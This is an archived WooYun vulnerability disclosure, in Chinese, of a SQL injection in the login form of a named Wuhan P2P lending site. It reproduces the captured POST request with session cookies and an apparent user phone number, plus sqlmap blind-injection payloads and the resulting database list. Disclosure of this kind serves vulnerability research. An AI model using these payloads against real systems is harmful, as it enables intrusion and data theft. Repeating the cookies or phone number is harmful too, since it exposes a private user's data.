乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-16: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-28: 厂商已经主动忽略漏洞,细节向公众公开
P2P金融长投在线存在SQL注入漏洞。武汉长投在线电子商务有限公司(旗下网站长投在线www.changtounet.com),总部位于九省通衢的湖北省武汉市。公司是一家拥有深厚金融行业底蕴和优秀基因的创新型企业,拥有完整的产品研发、风险控制及客户服务体系。
1、注入点:(burpLog)(参数:IDcard)
POST /login/default.aspx HTTP/1.1Content-Length: 72Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.changtounet.com:80/Cookie: ASP.NET_SessionId=yxcfxluwldljzhvk35zn2yig; MyCookie=4214; gsxw=3199; Hm_lvt_d7304ba98cf3fae6cc0b5e18136b84de=1450064855,1450065351,1450065457,1450065458; Hm_lpvt_d7304ba98cf3fae6cc0b5e18136b84de=1450065458; IESESSION=alive; pgv_pvi=7978089472; pgv_si=s9061854208; ctusername=18649803761; zrdj=113; hyxw=85; mtbd=109; HMACCOUNT=C516BAD6B74D7B08; __qc_wId=712; pgv_pvid=7820796038Host: www.changtounet.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*act=IDcardYz&IDcard=-1
sqlmap resumed the following injection point(s) from stored session:---Parameter: IDcard (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: act=IDcardYz&IDcard=-9277' OR 6227=6227 AND 'qQrm' LIKE 'qQrm Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: act=IDcardYz&IDcard=-1' OR 1596=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'AKUN' LIKE 'AKUN---
2、数据库用户及权限:
3、所有数据库:
available databases [13]:[*] changtou1019[*] changtou1206[*] Changtou_weixin[*] ChangTouNew[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] weixin0316[*] weixin0918[*] weixin1019
参数过滤。
未能联系到厂商或者厂商积极拒绝